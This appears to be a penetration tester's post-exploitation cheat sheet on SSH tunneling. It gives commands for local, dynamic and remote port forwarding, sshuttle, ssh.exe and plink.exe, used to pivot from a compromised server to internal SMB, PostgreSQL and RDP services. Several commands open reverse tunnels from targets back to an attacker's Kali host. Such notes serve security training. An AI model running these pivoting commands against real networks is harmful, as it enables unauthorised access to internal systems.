# SSH Tunneling

## Local Port Forwarding

| System             | IP address     |
| ------------------ | -------------- |
| LHOST              | 192.168.50.10  |
| APPLICATION SERVER | 192.168.100.10 |
| DATABASE SERVER    | 10.10.100.20   |
| WINDOWS HOST       | 172.16.50.10   |

* LHOST > APPLICATION SERVER > DATABASE SERVER > WINDOWS HOST
*

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/post-explotation/imgs/Pasted%20image%2020250726112550.png)

**Application Server**

```
ssh -N -L 0.0.0.0:4455:172.16.50.10:445 <USERNAME>@10.10.100.20
```

**Kali**

```
smbclient -p 4455 //192.168.50.10/<SHARE> -U <USERNAME>
```

## Dinamic port Forwarding

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/post-explotation/imgs/Pasted%20image%2020250726120154.png)

**Application Server**

```
ssh -N -D 0.0.0.0:9999 <USERNAME>@10.10.100.20
```

**Kali**

Edit the /etc/proxychains4.conf file

```/etc/proxychains4.conf
socks5 192.168.100.10 9999
```

Try the connexion

```
sudo proxychains smbclient //172.16.50.10/<SHARE> -U <USERNAME> --password=<PASSWORD>
```

## Remote port Forward

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/post-explotation/imgs/Pasted%20image%2020250726124642.png)

**Kali**

```
sudo systemctl start ssh
sudo ss -tulpn
```

**Application Server**

```
ssh -N -R 127.0.0.1:2345:10.10.100.20:5432 <USERNAME>@192.168.50.10
```

**Kali**

```
psql -h 127.0.0.1 -p 2345 -U postgres
```

## Remote Dynamic Port Forwarding

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/post-explotation/imgs/Pasted%20image%2020250726154332.png)

**Application Server**

```
ssh -N -R 9998 <USERNAME>@192.168.50.10
```

**Kali**

Edit the /etc/proxychains4.conf file

```/etc/proxychains4.conf
socks5 127.0.0.1 9998
```

Try the connexion

```
sudo proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20
```

## Using Shuttle

**Application Server**

```
socat TCP-LISTEN:2222,fork TCP:10.10.100.20:22
```

**Kali**

```
sshuttle -r <USERNAME>@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24
smbclient -L //172.16.50.10/ -U <USERNAME> --password=<PASSWORD>
```

## ssh.exe

**Kali**

```
sudo systemctl start ssh
xfreerdp /u:<user> /p:<pass> /v:<ip>
```

**Windows Machine**

```
where ssh
ssh -N -R 9998 kali@<ip_kali>
```

**Kali**

```
ss -ntplu
```

```/etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9998
```

```
proxychains psql -h 10.4.50.215 -U postgres
```

## plink.exe

**Kali**

Upload plink.exe

```shell
find / -name plink.exe 2>/dev/null
/usr/share/windows-resources/binaries/plink.exe
```

**Windows Machine**

```batchfile
plink.exe -ssh -l <USERNAME> -pw <PASSWORD> -R 127.0.0.1:9833:127.0.0.1:3389 <kali_ip>
```

**Kali**

```shell
ss -tulpn
xfreerdp3 /u:<USERNAME> /p:<PASSWORD> /v:127.0.0.1:9833
```